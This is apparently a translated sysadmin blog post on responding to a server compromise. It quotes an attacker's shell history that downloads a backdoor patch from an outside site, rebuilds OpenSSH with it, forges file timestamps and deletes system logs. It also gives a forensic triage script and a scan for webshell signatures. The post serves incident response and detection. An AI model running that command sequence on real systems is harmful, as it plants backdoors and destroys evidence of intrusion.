Yesterday we found that many programs on the server had been trojaned (injected with malicious code). While the developers were still cleaning up the infected files, this morning we found that the game backend would not open: the backend's entry files had been deleted from the server. After restoring index.php and Admin.php, access returned to normal. Since nobody was working on the server during the night, we concluded it had been compromised and began to investigate:
1. First, look at the security log with the following command:
more /var/log/secure | grep Accepted
Several records in the output looked suspicious:
Jul 05:32:17 localhost sshd[21684]: Accepted password for root from 103.231.104.70 port 3551 ssh2
Jul 05:37:52 localhost sshd[22754]: Accepted password for root from 103.231.104.70 port 3602 ssh2
Jul 05:44:40 localhost sshd[23396]: Accepted password for root from 103.231.104.70 port 3650 ssh2
These records show that starting at 05:32 the root account logged in successfully by password from the IP 103.231.104.70. A lookup showed that this IP belongs to an SAR (Special Administrative Region) address range; it is most likely a proxy machine used by the attacker.
2. Next we checked the system log (messages) and the wtmp log and found nothing wrong.
3. Then we looked at the shell history and found the problem:
387 cp -p /etc/ssh/sshd_config{,.bak}
388 wget www.k2a.cn/tools/open.tar.gz
406 cd /etc/ssh/
407 ls
408 wget www.k2a.cn/tools/patch.tar.gz
409 ls
410 tar -zxvf open.tar.gz
411 tar -zxvf patch.tar.gz
412 cd openssh-5.9p1.patch/
413 cp sshbd5.9p1.diff ../openssh-5.9p1
414 cd ../openssh-5.9p1
415 patch < sshbd5.9p1.diff
416 vim includes.h
417 ssh -V
418 vim includes.h
419 vi version.h
420 ssh -V
421 vi version.h
422 ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
423 make
424 make install
425 id
426 touch -r sshd_config.bak ssh_config
427 cd ..
428 touch -r sshd_config.bak ssh_config
429 service sshd reload
430 ls
431 rm -rf *.tar.gz
432 rm -rf open*
433 rm -rf *.bak
437 cd /var/log/
439 rm -rf wtmp
440 rm -rf *log
442 cd /etc/scl/prefixes/
448 rm -rf *
From the history above it is clear that the attacker installed an SSH backdoor on the server. I looked up a few articles about SSH backdoors; interested readers can see:
Http://www.freebuf.com/tools/10474.html
http://redkey.blog.51cto.com/335290/1345091
As the articles above describe, the attacker also modified the SSH version string (the history shows version.h being edited), so ssh -V still reports the previous version. Emergency handling is currently under way:
Reinstall OpenSSH, updating to the latest version
Change the SSH default port
Add an SSH access policy in iptables
When reinstalling the new version of OpenSSH, make && make install failed with the following error:
Cannot remove '/usr/bin/ssh': Operation not permitted
lsattr showed that the ssh binary had the attributes usia set (i is immutable and a is append-only, which is why the file could not be removed). After clearing all of these attributes with chattr, the reinstall went through normally.
After installation, check again with ssh -V that the version is correct.
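As an added example (not part of the original post), the following script triages the OpenSSH binaries and configs for the two tricks visible in the attacker's history: mtimes forged with touch -r and files locked with chattr. It assumes GNU or BusyBox stat; lsattr and rpm are used only when present.

```shell
#!/bin/sh
# Added example (not from the original post): triage the OpenSSH binaries and
# configs for the two tricks visible in the attacker's history above, mtimes
# forged with "touch -r" and files locked with chattr. Assumes GNU/BusyBox
# stat; lsattr and rpm are used only when present.

# "touch -r" copies another file's mtime, but the kernel always updates ctime,
# so a ctime far newer than the mtime means the file was altered after the
# timestamp it shows. Returns 0 when the gap exceeds $2 seconds (default 1 day).
mtime_ctime_gap() {
    f=$1; threshold=${2:-86400}
    mtime=$(stat -c %Y "$f" 2>/dev/null) || return 2
    ctime=$(stat -c %Z "$f" 2>/dev/null) || return 2
    [ $((ctime - mtime)) -gt "$threshold" ]
}

# Returns 0 when the immutable (i) or append-only (a) attribute is set, the
# flags that made "make install" fail with "Operation not permitted".
has_lock_attr() {
    command -v lsattr >/dev/null 2>&1 || return 2
    flags=$(lsattr -d "$1" 2>/dev/null | awk '{print $1}')
    case $flags in *i*|*a*) return 0 ;; esac
    return 1
}

triage_ssh() {
    for f in /usr/bin/ssh /usr/sbin/sshd /etc/ssh/sshd_config /etc/ssh/ssh_config; do
        [ -e "$f" ] || continue
        mtime_ctime_gap "$f" && echo "SUSPECT $f: ctime much newer than mtime (touch -r?)"
        has_lock_attr "$f" && echo "SUSPECT $f: immutable/append-only attribute set"
    done
    # Package checksums expose a rebuilt binary even when version.h was patched
    # so that "ssh -V" still prints the old version ("5" = md5 mismatch).
    if command -v rpm >/dev/null 2>&1; then
        rpm -V openssh openssh-clients openssh-server 2>/dev/null | grep -E '^..5' \
            && echo "SUSPECT: rpm checksum mismatch listed above"
    fi
    return 0
}

triage_ssh
```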
Our development colleagues also helped search the code for the Trojan, using the following script:
#!/bin/bash
# Scan every site under /home/web for common webshell signatures and for
# .php files modified within the last 24 hours; findings are written to /opt/safelog.
logdir=/opt/safelog
[ -d "$logdir" ] || mkdir -p "$logdir"

function checksafe() {
    path="/home/web/$1"
    cd "$path" || return
    # The original patterns "gunerpress" and "base64_decoolcode" were typos that
    # could never match; they are corrected here to gzuncompress and base64_decode.
    re=$(find . -name '*.php' -print0 | xargs -0 grep -E 'phpspy|c99sh|milw0rm|eval\(gzuncompress|eval\(base64_decode|spider_bc|eval\(\$_POST\[|assert\(\$_POST\[')
    if [ -n "$re" ]; then
        echo "$re" > "$logdir/${1}_$(date +%y%m%d).txt"
    fi
    modifytime "$1"
}

function modifytime() {
    # .php files changed in the last day (run from the site directory set by checksafe)
    re=$(find . -mtime -1 -type f -name '*.php')
    if [ -n "$re" ]; then
        echo "$re" > "$logdir/${1}_mf_$(date +%y%m%d).txt"
    fi
}

for i in $(cd /home/web; ls); do
    echo "$i"
    checksafe "$i"
done
This article is from the "Operation and Maintenance Road" blog; reprinting is declined.
Experience and solution for an SSH backdoor implant